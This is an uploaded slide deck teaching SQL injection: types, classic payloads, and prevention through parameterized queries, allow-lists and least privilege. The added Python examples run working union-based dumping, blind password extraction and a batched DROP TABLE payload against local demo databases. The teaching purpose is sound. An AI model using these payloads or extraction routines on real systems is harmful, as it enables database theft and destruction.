SQL Injection

Uploaded by

Ammar Mousa

SQL Injection

What is SQL Injection?

• SQL injection is a code injection technique in which attacker-supplied text becomes part of an SQL statement; in the worst case it lets the attacker read, alter or destroy your database.
• SQL injection is one of the most common web hacking techniques.
• SQL injection is the placement of malicious code in SQL statements, via web page input.


How does SQL Injection work?

The application builds its SQL statement by pasting user input into a string, so the database parses the attacker's text as part of the query instead of treating it as a plain value.

Impact of SQL Injection

• There are a number of things an attacker can do when exploiting an SQL injection on a vulnerable website. Usually, it depends on the privileges of the user the web application uses to connect to the database server. By exploiting an SQL injection vulnerability, an attacker can:
• Add, delete, edit or read content in the database
• Read files (for example source code or configuration) on the database server, if the database account is allowed to read the file system
• Write files to the database server


Types of SQL Injection

1) In-band SQLi (classic)
2) Inferential SQLi (blind)
3) Out-of-band SQLi
In-band SQLi

• In-band SQL Injection occurs when an attacker is able to use the same communication channel to both launch the attack and gather results.
• The two most common types of in-band SQL Injection are Error-based SQLi and Union-based SQLi.

Error-based SQLi:
is an in-band SQL Injection technique that relies on error messages thrown by the database server to obtain information about the structure of the database (table and column names, the number of columns a query returns). It only works while the application shows database errors to the user.

Union-based SQLi:
is an in-band SQL injection technique that leverages the UNION SQL operator to combine the results of two or more SELECT statements into a single result set, which the application then renders as if it were the original query's output. The attacker's SELECT must return the same number of columns as the original one, with compatible types.
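The two in-band techniques chain naturally: the error message reveals how many columns the original SELECT returns, and the UNION then pulls other tables through the same page. The following is an added example, not code from the slides. It assumes Python's sqlite3 module, a constructed Users/Suppliers schema, and a vulnerable lookup_user() that concatenates UserId exactly as the slides' pseudocode does; sqlite_master stands in for information_schema.

```python
import sqlite3

# Constructed sample schema (not from the slides): the Users table the slides
# query plus a Suppliers table the attacker wants to read.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Users (UserId INTEGER, Name TEXT, Pass TEXT);
        INSERT INTO Users VALUES (105, 'Ali Anwar', 'account1!');
        CREATE TABLE Suppliers (SupplierId INTEGER, ContactEmail TEXT, Notes TEXT);
        INSERT INTO Suppliers VALUES (1, 'acme@example.com', 'net 30');
    """)
    return conn

def lookup_user(conn, txt_user_id):
    """Vulnerable lookup: UserId is concatenated, exactly as on the slides."""
    sql = "SELECT UserId, Name, Pass FROM Users WHERE UserId = " + txt_user_id
    return conn.execute(sql).fetchall()

def leaked_error(conn, payload):
    """Error-based step: the database error text a careless page would show, or None."""
    try:
        lookup_user(conn, payload)
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)

def find_column_count(conn, max_cols=10):
    """Use the UNION column-count error as an oracle: the first count that
    produces no error is the width of the original SELECT."""
    for n in range(1, max_cols + 1):
        nulls = ", ".join(["NULL"] * n)
        if leaked_error(conn, "0 UNION SELECT " + nulls) is None:
            return n
    return None

def union_dump(conn, n_cols):
    """Union-based step: pull rows from other tables through the same response.
    UserId = 0 matches nothing, so only the attacker's rows come back."""
    cols = ["name", "sql"] + ["NULL"] * (n_cols - 2)
    tables = lookup_user(
        conn, "0 UNION SELECT %s FROM sqlite_master WHERE type = 'table'" % ", ".join(cols))
    suppliers = lookup_user(
        conn, "0 UNION SELECT SupplierId, ContactEmail, Notes FROM Suppliers")
    return sorted(row[0] for row in tables), suppliers

if __name__ == "__main__":
    db = make_db()
    print(leaked_error(db, "105 UNION SELECT 1"))
    width = find_column_count(db)
    print("columns:", width)
    print(union_dump(db, width))
```

The error text differs per database (MySQL, MSSQL and PostgreSQL each word the column-count mismatch differently), but the method is the same: probe until the UNION is accepted, then substitute real column names for the NULL placeholders.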
Inferential SQLi

• In an inferential (blind) SQLi attack, no data is actually transferred via the web application and the attacker would not be able to see the result of an attack in-band.
• Instead, an attacker is able to reconstruct the database structure and contents by sending payloads and observing the web application's response and the resulting behavior of the database server: either a difference in the page returned (boolean-based) or a difference in how long the server takes to answer (time-based).
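The page never returns data, only a yes/no answer, yet the secret still leaks one character per question. The following boolean-based extraction is an added example, not code from the slides; it assumes Python's sqlite3, a constructed Users table, and a vulnerable user_exists() endpoint that reveals only whether a row came back (think of a page that prints either "welcome" or "no such user").

```python
import sqlite3
import string

# Constructed sample data (not from the slides)
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserId INTEGER, Name TEXT, Pass TEXT)")
    conn.execute("INSERT INTO Users VALUES (105, 'Ali Anwar', 'account1!')")
    return conn

def user_exists(conn, txt_user_id):
    """Vulnerable endpoint that leaks exactly one bit: did a row come back?"""
    sql = "SELECT 1 FROM Users WHERE UserId = " + txt_user_id
    return conn.execute(sql).fetchone() is not None

# Characters we are willing to guess; a real tool would also try a binary
# search on unicode() to cut the number of requests.
CHARSET = string.ascii_letters + string.digits + string.punctuation

def extract_password(conn, name, max_len=64):
    """Boolean-based blind extraction: rebuild a secret one character at a
    time from yes/no answers. Returns (secret, number_of_requests)."""
    secret_expr = "(SELECT Pass FROM Users WHERE Name = '%s')" % name.replace("'", "''")
    recovered, requests = "", 0
    for pos in range(1, max_len + 1):
        # First question: is the secret already shorter than this position?
        requests += 1
        if user_exists(conn, "105 AND length(%s) < %d" % (secret_expr, pos)):
            return recovered, requests
        # Otherwise ask "is character <pos> equal to X?" for each candidate.
        for ch in CHARSET:
            requests += 1
            probe = "105 AND substr(%s, %d, 1) = '%s'" % (
                secret_expr, pos, ch.replace("'", "''"))
            if user_exists(conn, probe):
                recovered += ch
                break
        else:
            raise ValueError("character at position %d is not in CHARSET" % pos)
    return recovered, requests

if __name__ == "__main__":
    db = make_db()
    print(extract_password(db, "Ali Anwar"))
```

A time-based variant uses the same true/false predicate but replaces the visible difference with a deliberate delay, which is why the out-of-band section below treats unstable response times as the limiting factor.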
Out-of-band SQLi

• Out-of-band SQL Injection occurs when an attacker is unable to use the same channel to launch the attack and gather results.
• Out-of-band techniques offer an attacker an alternative to inferential time-based techniques, especially if the server responses are not very stable (making an inferential time-based attack unreliable).
• Out-of-band SQLi techniques rely on the database server's ability to make DNS or HTTP requests to deliver data to an attacker, so they depend on which database features are enabled and on the database server having outbound network access.
Examples

SQL Injection Based on 1=1 is Always True

• If there is nothing to prevent a user from entering "wrong" input, the user can enter some "smart" input like this:
  UserId: 105 OR 1=1
• Then, the SQL statement will look like this:
  SELECT * FROM Users WHERE UserId = 105 OR 1=1;
• The SQL above is valid and will return ALL rows from the "Users" table, since OR 1=1 is always TRUE.
• A hacker might get access to all the user names and passwords in a database, by simply inserting 105 OR 1=1 into the input field.
SQL Injection Based on ""="" is Always True

• The login query looks like this (the slides use double quotes as the string delimiter; in most databases the string delimiter is the single quote, and the same payload then reads ' OR ''='):
  SELECT * FROM Users WHERE Name ="Ali Anwar" AND Pass ="account1!"
• A hacker might get access to user names and passwords in a database by simply inserting " OR ""=" into the user name or password text box:
  User Name: " or ""="
  Password: " or ""="
• The code at the server will create a valid SQL statement like this:
  SELECT * FROM Users WHERE Name ="" or ""="" AND Pass ="" or ""=""
• The SQL above is valid and will return all rows from the "Users" table, since OR ""="" is always TRUE.
SQL Injection Based on Batched SQL Statements

• A batch of SQL statements is a group of two or more SQL statements, separated by semicolons.
• Example:
  SELECT * FROM Users; DROP TABLE Suppliers
• Look at the following example:
  txtUserId = getRequestString("UserId");
  txtSQL = "SELECT * FROM Users WHERE UserId = " + txtUserId;
• And the following input:
  User id: 105; DROP TABLE Suppliers
• The valid SQL statement would look like this:
  SELECT * FROM Users WHERE UserId = 105; DROP TABLE Suppliers;
• Whether the second statement actually runs depends on the database driver: some execute every statement in the string, others accept only one statement per call.
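The three slide examples, run against a real database so the row counts and the dropped table can be observed. This is an added example, not code from the slides; it assumes Python's sqlite3, a constructed Users/Suppliers schema, single-quoted string literals in login() (the slides' double quotes are not the string delimiter in most databases), and it uses executescript() to stand in for a driver that accepts batched statements.

```python
import sqlite3

# Constructed sample data (not from the slides); Suppliers exists only to be dropped
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Users (UserId INTEGER, Name TEXT, Pass TEXT);
        INSERT INTO Users VALUES (105, 'Ali Anwar', 'account1!');
        INSERT INTO Users VALUES (106, 'Sara', 'hunter2');
        CREATE TABLE Suppliers (SupplierId INTEGER);
    """)
    return conn

def get_user(conn, txt_user_id):
    """Slide pseudocode: txtSQL = "SELECT * FROM Users WHERE UserId = " + txtUserId"""
    txt_sql = "SELECT * FROM Users WHERE UserId = " + txt_user_id
    return conn.execute(txt_sql).fetchall()

def login(conn, name, password):
    """Login query built by concatenation, with single-quoted literals."""
    sql = ("SELECT * FROM Users WHERE Name = '" + name +
           "' AND Pass = '" + password + "'")
    return conn.execute(sql).fetchall()

def table_exists(conn, table):
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (table,)).fetchone()
    return row is not None

def batched(conn, txt_user_id):
    """Batched-statement example. Returns (single_call_refused, suppliers_still_there)."""
    txt_sql = "SELECT * FROM Users WHERE UserId = " + txt_user_id
    refused = False
    try:
        conn.execute(txt_sql)      # Python's sqlite3 allows one statement per execute()
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        refused = True
    # A driver that accepts batches (here: executescript) runs the DROP as well.
    conn.executescript(txt_sql)
    return refused, table_exists(conn, "Suppliers")

if __name__ == "__main__":
    db = make_db()
    print("1=1 rows:", len(get_user(db, "105 OR 1=1")))
    print("''='' rows:", len(login(db, "' OR ''='", "' OR ''='")))
    print("batched:", batched(db, "105; DROP TABLE Suppliers"))
```

Note the ""="" case: AND binds tighter than OR, so the statement reads Name='' OR (''='' AND Pass='') OR ''='', and the trailing OR alone is enough to match every row.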
SQL Injection Prevention

1. Employ comprehensive data sanitization. Websites must filter all user input. Ideally, user data should be filtered for context. For example, email addresses should be filtered to allow only the characters allowed in an e-mail address, phone numbers should be filtered to allow only the characters allowed in a phone number, and so on. Prefer an allow-list of what is valid over a deny-list of "dangerous" characters, and treat this as defense in depth rather than the primary control (see item 4).

2. Use a web application firewall. A popular example is the free, open source module ModSecurity which is available for Apache, Microsoft IIS, and nginx web servers. ModSecurity provides a sophisticated and ever-evolving set of rules to filter potentially dangerous web requests. Its SQL injection rules catch many common attempts to sneak SQL through web channels, but a WAF can be evaded and does not fix the underlying bug.
3. Limit database privileges by context.
Create multiple database user accounts with the minimum levels of privilege for their usage environment. For example, the code behind a login page should query the database using an account limited only to the relevant credentials table. This bounds the impact of an injection that does get through: the attacker inherits the application account's privileges and nothing more.

4. Avoid constructing SQL queries with user input.
Even data sanitization routines can be flawed. Use SQL variable binding with prepared statements (parameterized queries): the statement text is fixed and the user's value is sent separately, so it can never be parsed as SQL. This is the primary defense. Stored procedures help only if they do not themselves build SQL strings from their arguments.
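Items 1, 3 and 4 side by side, as an added example that is not code from the slides. It assumes Python's sqlite3 and a constructed Users table; because SQLite has no user accounts, a read-only connection (mode=ro) stands in for a database account that holds SELECT only, and USER_ID_RE is an assumed allow-list for a numeric UserId.

```python
import os
import re
import sqlite3
import tempfile

# Constructed sample data (not from the slides), written to a temp file so a
# second, read-only connection can be opened on it.
def make_db(path):
    conn = sqlite3.connect(path)
    conn.executescript("""
        CREATE TABLE Users (UserId INTEGER, Name TEXT, Pass TEXT);
        INSERT INTO Users VALUES (105, 'Ali Anwar', 'account1!');
        INSERT INTO Users VALUES (106, 'Sara', 'hunter2');
    """)
    conn.commit()
    conn.close()

def get_user_vulnerable(conn, txt_user_id):
    """The slides' concatenation, kept for comparison."""
    return conn.execute(
        "SELECT UserId, Name FROM Users WHERE UserId = " + txt_user_id).fetchall()

def get_user_bound(conn, txt_user_id):
    """Item 4: the value travels as a bound parameter, never as SQL text."""
    return conn.execute(
        "SELECT UserId, Name FROM Users WHERE UserId = ?", (txt_user_id,)).fetchall()

USER_ID_RE = re.compile(r"[0-9]{1,9}")   # assumed allow-list: a short decimal integer

def get_user_hardened(conn, txt_user_id):
    """Item 1 + item 4: context-specific allow-list, then a bound parameter."""
    if not USER_ID_RE.fullmatch(txt_user_id):
        raise ValueError("UserId must be a decimal integer")
    return conn.execute(
        "SELECT UserId, Name FROM Users WHERE UserId = ?", (int(txt_user_id),)).fetchall()

def open_least_privilege(path):
    """Item 3: a read-only connection, standing in for a SELECT-only DB account."""
    return sqlite3.connect("file:%s?mode=ro" % path, uri=True)

def write_refused(conn):
    """True if the connection's privileges stop a destructive statement."""
    try:
        conn.execute("DELETE FROM Users")
        conn.commit()
        return False
    except sqlite3.OperationalError:
        return True

def demo():
    path = os.path.join(tempfile.mkdtemp(), "app.db")
    make_db(path)
    ro = open_least_privilege(path)
    payload = "105 OR 1=1"
    results = {
        "vulnerable_rows": len(get_user_vulnerable(ro, payload)),   # injection works
        "bound_rows": len(get_user_bound(ro, payload)),             # payload is just a string
        "bound_literal_rows": len(get_user_bound(ro, "105")),       # normal lookup still works
        "hardened_ok": len(get_user_hardened(ro, "105")),
        "write_refused": write_refused(ro),
    }
    try:
        get_user_hardened(ro, payload)
        results["hardened_rejects_payload"] = False
    except ValueError:
        results["hardened_rejects_payload"] = True
    ro.close()
    return results

if __name__ == "__main__":
    print(demo())
```

The bound query alone already defeats the payload (it is compared as the literal string "105 OR 1=1" and matches nothing); the allow-list adds an early, loud rejection, and the read-only connection limits what an injection elsewhere in the application could do.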
5. Regularly apply software patches.
Because SQL injection vulnerabilities are regularly identified in commercial software, it is important to stay up to date on patching.

6. Continuously monitor SQL statements from database-connected applications.
This will help identify rogue SQL statements and vulnerabilities. Monitoring tools that utilize machine learning and/or behavioral analysis can be especially useful.
